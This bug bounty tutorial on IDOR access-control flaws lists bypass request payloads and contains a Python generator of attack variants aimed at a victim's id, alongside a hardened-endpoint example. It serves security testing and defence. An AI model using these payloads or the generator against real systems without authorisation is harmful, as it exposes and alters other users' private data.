AllAboutBugBounty/Insecure Direct Object References.md
2022-06-15 17:38:42 +07:00


Insecure Direct Object Reference (IDOR)

Introduction

Insecure Direct Object Reference (IDOR) is an access control vulnerability in which an application uses a client-supplied identifier (a user id, file name, order number, and so on) to look up an object without checking that the requesting user is authorized to access that object. The result is that one user can read or modify the data of any other user in the system simply by changing the identifier in the request.
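To make the flaw concrete, here is an added example (not code from the original page): a constructed Python model of a profile endpoint in three versions. The first is the IDOR itself, the second is a bad fix that validates the first `user_id` value while the handler behind it still uses the last one (the gap that HTTP Parameter Pollution exploits), and the third is the hardened form with the object-level check at the point of use. The profile data, the `user_id` parameter name and the tiny `Request` type are assumptions made for this example.

```python
"""A minimal model of an IDOR-prone endpoint next to its hardened form.

Added example, not code from the AllAboutBugBounty page. The users, the
profiles and the tiny Request object are constructed for the demonstration.
"""
from dataclasses import dataclass
from urllib.parse import parse_qs

# Constructed sample data: two accounts, each owning one profile record.
PROFILES = {
    111: {"owner": 111, "email": "hacker@mail.com"},
    222: {"owner": 222, "email": "victim@mail.com"},
}


@dataclass
class Request:
    session_user: int       # identity established by the session cookie
    query_string: str = ""  # raw query string, e.g. "user_id=111&user_id=222"


def vulnerable_get_profile(req: Request):
    """IDOR: the object is fetched by a client-supplied id and handed back to
    whoever asked; ownership is never checked."""
    values = parse_qs(req.query_string).get("user_id", [])
    if not values or not values[-1].isdigit():
        return 400, None
    # Which duplicate a framework picks varies (first, last, all joined); this model takes the last.
    profile = PROFILES.get(int(values[-1]))
    return (200, profile) if profile else (404, None)


def gated_get_profile(req: Request):
    """A common bad fix: a front gate compares the FIRST user_id with the
    session, while the handler behind it still reads the LAST one. That gap is
    exactly what HTTP Parameter Pollution (user_id=me&user_id=victim) exploits."""
    values = parse_qs(req.query_string).get("user_id", [])
    if not values or not values[0].isdigit() or int(values[0]) != req.session_user:
        return 403, None
    return vulnerable_get_profile(req)


def hardened_get_profile(req: Request):
    """Object-level authorization at the point of use: refuse ambiguous input,
    fetch the object, then check it belongs to the caller before returning it."""
    values = parse_qs(req.query_string).get("user_id", [])
    if len(values) != 1 or not values[0].isdigit():
        return 400, None                       # duplicated or malformed id: reject, don't guess
    profile = PROFILES.get(int(values[0]))
    if profile is None or profile["owner"] != req.session_user:
        return 404, None                       # same answer for missing and foreign objects
    return 200, profile
```

The hardened handler answers 404 for both a missing object and someone else's object, so the response cannot be used to enumerate which ids exist; the authorization check sits on the same parsed value the lookup uses, which is what closes the pollution gap.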

How to Find

  1. Add an id parameter to an endpoint that takes none. For example, if there was
GET /api/v1/getuser
[...]

Try this to bypass

GET /api/v1/getuser?id=1234
[...]
  1. HTTP Parameter Pollution: send the same parameter twice. A validation layer may check the first value while the handler uses the last one.
POST /api/get_profile
[...]
user_id=hacker_id&user_id=victim_id
  1. Add .json to the endpoint. Frameworks with format-based content negotiation may route the .json variant to a different handler or serializer that lacks the check.
GET /v2/GetData/1234
[...]

Try this to bypass

GET /v2/GetData/1234.json
[...]
  1. Test older API versions, which are often still deployed but missing the authorization checks added later.
POST /v2/GetData
[...]
id=123

Try this to bypass

POST /v1/GetData
[...]
id=123
  1. Wrap the ID with an array.
POST /api/get_profile
[...]
{"user_id":111}

Try this to bypass

POST /api/get_profile
[...]
{"user_id":[111]}
  1. Wrap the ID with a JSON object
POST /api/get_profile
[...]
{"user_id":111}

Try this to bypass

POST /api/get_profile
[...]
{"user_id":{"user_id":111}}
  1. JSON Parameter Pollution: duplicate the key in the JSON body. Most parsers keep the last value, but a validator in front of the handler may read the first.
POST /api/get_profile
[...]
{"user_id":"hacker_id","user_id":"victim_id"}
  1. Try to decode the ID if it is encoded (base64, hex, etc.). If it is a hash such as MD5, it cannot be decoded; instead, hash guessed values (emails, usernames, sequential numbers) and compare.
GET /GetUser/dmljdGltQG1haWwuY29t
[...]

dmljdGltQG1haWwuY29t => victim@mail.com

  1. If the site uses GraphQL, look for IDOR there too: object ids passed as query or mutation arguments are just as likely to go unchecked.
GET /graphql
[...]
GET /graphql.php?query=
[...]
  1. MFLAC (Missing Function Level Access Control): a case or encoding variant of a restricted path may still reach the handler while the access rule only matches the exact string.
GET /admin/profile

Try this to bypass

GET /ADMIN/profile
  1. Try swapping a UUID for a sequential number; the backend may look objects up by either key.
GET /file?id=90ri2-xozifke-29ikedaw0d

Try this to bypass

GET /file?id=302
  1. Change the HTTP method; a check applied to one verb may be missing on another.
GET /api/v1/users/profile/111

Try this to bypass

POST /api/v1/users/profile/111
  1. Path traversal: an authorization check may look at my_id before the path is normalized, while the final lookup resolves ../ and fetches victim_id.
GET /api/v1/users/profile/victim_id

Try this to bypass

GET /api/v1/users/profile/my_id/../victim_id
  1. Change the request content type (re-encode the body to match); a different body parser can bypass validation tied to the original one.
Content-type: application/xml

Try this to bypass

Content-type: application/json
  1. Send a wildcard instead of an ID; a backend that passes it straight into a query or file lookup may return every object.
GET /api/users/111

Try this to bypass

GET /api/users/*
  1. Try Google dorking to find additional endpoints (old API versions, debug or mobile routes) to test with the same techniques.
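The request-mutation techniques in this list are mechanical enough to generate from one baseline request. The following is an added example, not code from this page or from any bug bounty tool: a Python helper that takes a baseline request (method, path, headers, raw body) plus your own id and the victim's id, and emits one variant per technique. It goes slightly beyond the list: it tries every HTTP verb rather than only POST, and switches the content type in both directions (JSON to form-encoded and back). The `Req` type, the variant labels, the sample paths, parameter names and ids are all constructed for the example; sending the requests and diffing the responses is left to the tester.

```python
"""Generate the IDOR request variants described above from one baseline request.

Added example; not code from the AllAboutBugBounty page or any tool it names.
It builds request descriptions only (method, path, headers, raw body). Paths,
parameter names and ids are constructed sample values.
"""
import base64
import binascii
import json
import re
from dataclasses import dataclass, field, replace
from urllib.parse import parse_qs, urlencode

FORM = "application/x-www-form-urlencoded"


@dataclass
class Req:
    method: str
    path: str                              # path plus optional ?query
    headers: dict = field(default_factory=dict)
    body: str = ""                         # raw, so duplicate JSON keys can be expressed


def decode_id(token: str):
    """Reveal what an opaque id is. Only encodings can be reversed: a hash
    such as md5 has to be matched by hashing guessed values instead."""
    try:
        text = base64.b64decode(token + "=" * (-len(token) % 4), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def json_dup_keys(others: dict, key: str, first, second) -> str:
    """Serialise `others` plus `key` twice; most parsers keep the last value."""
    head = json.dumps(others)[:-1] + ("," if others else "")
    k = json.dumps(key)
    return f"{head}{k}:{json.dumps(first)},{k}:{json.dumps(second)}}}"


def idor_variants(base: Req, param: str, my_id, victim_id, int_guess="1"):
    """Return (label, Req) pairs: one per technique on the page, generalised
    to every HTTP verb and to both directions of the content-type swap."""
    my_s, victim_s = str(my_id), str(victim_id)
    p, _, q = base.path.partition("?")
    id_in_path = re.compile(rf"(?<=/){re.escape(victim_s)}(?=/|$)")
    is_json = base.headers.get("Content-Type", "").startswith("application/json")
    out = []

    def join(path):  # re-attach the original query string, if any
        return path + ("?" + q if q else "")

    def add(label, **changes):
        out.append((label, replace(base, **changes)))

    if not q and not id_in_path.search(p):  # endpoint takes no id: add one
        add("add-param", path=f"{p}?{urlencode({param: victim_s})}")
    # HTTP parameter pollution: same key twice, ours first, the victim's last
    hpp = urlencode([(param, my_s), (param, victim_s)])
    add("hpp-query", path=f"{p}?{hpp}")
    add("hpp-body", method="POST", body=hpp, headers={**base.headers, "Content-Type": FORM})
    add("json-suffix", path=join(p + ".json"))
    m = re.search(r"/v(\d+)/", p)           # /v2/ -> /v1/
    if m and int(m.group(1)) > 1:
        add("older-version", path=join(p.replace(m.group(0), f"/v{int(m.group(1)) - 1}/", 1)))
    if is_json and base.body:               # array wrap, object wrap, duplicate keys, JSON -> form
        others = {k: v for k, v in json.loads(base.body).items() if k != param}
        add("array-wrap", body=json.dumps({**others, param: [victim_id]}))
        add("object-wrap", body=json.dumps({**others, param: {param: victim_id}}))
        add("json-dup-keys", body=json_dup_keys(others, param, my_id, victim_id))
        add("ctype-form", body=urlencode({**others, param: victim_s}),
            headers={**base.headers, "Content-Type": FORM})
    elif base.body:                         # form -> JSON
        form = {k: v[-1] for k, v in parse_qs(base.body).items()}
        add("ctype-json", body=json.dumps({**form, param: victim_id}),
            headers={**base.headers, "Content-Type": "application/json"})
    segs = p.split("/")                     # MFLAC-style case variant of the first segment
    if len(segs) > 1 and segs[1]:
        add("case-flip", path=join("/".join([segs[0], segs[1].upper()] + segs[2:])))
    if id_in_path.search(p):                # id lives in the path
        if not victim_s.isdigit():
            add("uuid-to-int", path=join(id_in_path.sub(int_guess, p)))
        add("traversal", path=join(id_in_path.sub(f"{my_s}/../{victim_s}", p)))
        add("wildcard", path=join(id_in_path.sub("*", p)))
    for verb in ("GET", "POST", "PUT", "PATCH", "DELETE"):
        if verb != base.method:
            add(f"method-{verb}", method=verb)
    return out


if __name__ == "__main__":
    base = Req("POST", "/api/v2/users/profile/222",
               {"Content-Type": "application/json"}, '{"user_id": 111}')
    for label, r in idor_variants(base, "user_id", 111, 222):
        print(f"{label:14} {r.method} {r.path} {r.body}")
    print(decode_id("dmljdGltQG1haWwuY29t"))
```

Duplicate JSON keys cannot be expressed through a dict, so that variant is built as a raw string; Python's own `json.loads` keeps the last value, which is the behaviour the technique counts on. GraphQL and Google dorking are discovery steps rather than request mutations, so they are not generated here.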

References